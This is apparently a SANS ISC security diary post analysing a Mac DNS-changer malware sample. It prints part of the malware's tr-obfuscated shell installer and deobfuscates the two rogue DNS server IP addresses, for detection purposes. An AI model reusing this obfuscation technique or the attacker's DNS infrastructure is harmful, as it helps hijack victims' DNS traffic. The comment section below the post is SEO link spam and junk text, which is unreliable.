(Minor) evolution in Mac DNS changer malware
Back in November last year we published a diary about Mac DNS changer malware (http://isc.sans.org/diary.html?storyid=3595). The main idea about this was to let Mac users aware that the bad guys are not ignoring this platform any more.
While the malware itself was not anything spectacular (i.e. it did not exploit any vulnerabilities, but was based on social engineering), the way it was packed showed that the attackers meant real business.
All the malware did was change local DNS servers to couple of servers in a known bad network, and tell the command and control server that a new victim is ready.
The anti-virus coverage was especially disappointing. Only couple of anti-virus programs detected the original sample (a DMG file). This improved a bit over the time, so when I tested the sample again today on VirusTotal, 10 anti-virus programs detected it.
One of our readers, Matt, submitted a new sample today. I quickly analyzed it and the sample does exactly the same thing as the one from September – it changes the DNS servers and reports to a C&C server.
However, one thing I noticed was that the attackers started obfuscating the installation code. The obfuscation is very, very simple (they only use the tr command) but, unfortunately, it was enough to fool almost *all* anti-virus programs – according to VirusTotal, this new sample was detected by only 2 (!!) AV programs. Signature detection failure I would say …
The deobfuscation is really simple: the new sample looks like this:
#!/bin/sh
x=`cat "$0" |wc -l|awk '{print $1}'`;x=`expr $x - 2`;tail -$x "$0" |tr vdehrujzpbqafwtgkxyilcnos
upxmfqrzibdanwgkethlcyosv>1;s1=cx.zxx.aax.zq;s2=cx.zxx.aaz.asw;
sh 1 `echo $s1|tr qazwsxedcr 0123456789` `echo $s2| tr qazwsxedcr 0123456789`;exit;
#!/bpf/oy
daxy="/Lpbjajc/Ifxkjfkx Pivt-Ifo"
PSID=$( (/voj/obpf/olvxpi | tjkd PjphajcSkjsplk | okq -k 'o/.*PjphajcSkjsplk : //')<< EOF
Ndkf
…
In other words, they take the file, count the lines, subtract 2 from the line number, tail the rest and pass it through the first tr command, and redirect the output to 1.
Second 2 tr commands are used to deobfuscate the s1 and s2 variables, which will contain the IP addresses of the DNS servers. These can be easily deobfuscated manually:
$ s1=cx.zxx.aax.zq;s2=cx.zxx.aaz.asw; echo $s1|tr qazwsxedcr 0123456780
85.255.115.20
$ echo $s2| tr qazwsxedcr 0123456789
85.255.112.143
As you can see, it's the same network as before, so make sure that you are monitoring any DNS requests going there since they indicate you have infected machines on your network. And for the AV vendors – they will obviously have to step up on the Mac front.
--
Bojan
Comments
Anonymous
Dec 3rd 2022
9 months ago
Anonymous
Dec 3rd 2022
9 months ago
<a hreaf="https://technolytical.com/">the social network</a> is described as follows because they respect your privacy and keep your data secure. The social networks are not interested in collecting data about you. They don't care about what you're doing, or what you like. They don't want to know who you talk to, or where you go.
<a hreaf="https://technolytical.com/">the social network</a> is not interested in collecting data about you. They don't care about what you're doing, or what you like. They don't want to know who you talk to, or where you go. The social networks only collect the minimum amount of information required for the service that they provide. Your personal information is kept private, and is never shared with other companies without your permission
Anonymous
Dec 26th 2022
9 months ago
Anonymous
Dec 26th 2022
9 months ago
<a hreaf="https://defineprogramming.com/the-public-bathroom-near-me-find-nearest-public-toilet/"> nearest public toilet to me</a>
<a hreaf="https://defineprogramming.com/the-public-bathroom-near-me-find-nearest-public-toilet/"> public bathroom near me</a>
Anonymous
Dec 26th 2022
9 months ago
<a hreaf="https://defineprogramming.com/the-public-bathroom-near-me-find-nearest-public-toilet/"> nearest public toilet to me</a>
<a hreaf="https://defineprogramming.com/the-public-bathroom-near-me-find-nearest-public-toilet/"> public bathroom near me</a>
Anonymous
Dec 26th 2022
9 months ago
Anonymous
Dec 26th 2022
9 months ago
https://defineprogramming.com/
Dec 26th 2022
9 months ago
distribute malware. Even if the URL listed on the ad shows a legitimate website, subsequent ad traffic can easily lead to a fake page. Different types of malware are distributed in this manner. I've seen IcedID (Bokbot), Gozi/ISFB, and various information stealers distributed through fake software websites that were provided through Google ad traffic. I submitted malicious files from this example to VirusTotal and found a low rate of detection, with some files not showing as malware at all. Additionally, domains associated with this infection frequently change. That might make it hard to detect.
https://clickercounter.org/
https://defineprogramming.com/
Dec 26th 2022
9 months ago
rthrth
Jan 2nd 2023
9 months ago